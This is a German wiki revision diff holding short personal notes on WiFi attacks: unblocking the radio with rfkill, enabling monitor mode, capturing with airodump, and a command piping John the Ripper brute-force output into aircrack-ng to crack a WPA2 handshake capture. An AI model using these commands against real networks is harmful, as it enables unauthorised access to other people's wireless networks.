Wlan: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Signux (Diskussion | Beiträge) Keine Bearbeitungszusammenfassung |
Signux (Diskussion | Beiträge) Keine Bearbeitungszusammenfassung |
||
| (3 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
| Zeile 1: | Zeile 1: | ||
Prüfen ob Wlan Soft block gesetzt ist | |||
<code>rfkill list all</code> | <code>rfkill list all</code> | ||
Softblock deaktivieren | |||
<code>rfkill unblock 1</code> | |||
Monitor mode aktivieren (status anzeigen lassen <code>iw dev</code> ) | |||
<pre> | |||
iw phy phy0 interface add mon0 type monitor | |||
</pre> | |||
<pre> | <pre> | ||
airodump | airodump | ||
</pre> | </pre> | ||
[http://www.hitech-blog.com/htw/angriffe-auf-wlans-mit-aircrack-ng-tutorial/ tutorial aircrack] | [http://www.hitech-blog.com/htw/angriffe-auf-wlans-mit-aircrack-ng-tutorial/ tutorial aircrack] [https://www.elektronik-kompendium.de/sites/net/2101111.htm deutsches tutorial] | ||
[http://www.example.com test] airodump results with john the ripper | [http://www.example.com test] airodump results with john the ripper | ||
<code>john --incremental=all --stdout | aircrack-ng -a 2 -e WirelessNetwork WirelessNetwork-01.cap -w -</code> | <code>john --incremental=all --stdout | aircrack-ng -a 2 -e WirelessNetwork WirelessNetwork-01.cap -w -</code> | ||
Aktuelle Version vom 15. Juni 2017, 21:32 Uhr
Prüfen ob Wlan Soft block gesetzt ist
rfkill list all
Softblock deaktivieren
rfkill unblock 1
Monitor mode aktivieren (status anzeigen lassen iw dev )
iw phy phy0 interface add mon0 type monitor
airodump
tutorial aircrack deutsches tutorial
test airodump results with john the ripper
john --incremental=all --stdout | aircrack-ng -a 2 -e WirelessNetwork WirelessNetwork-01.cap -w -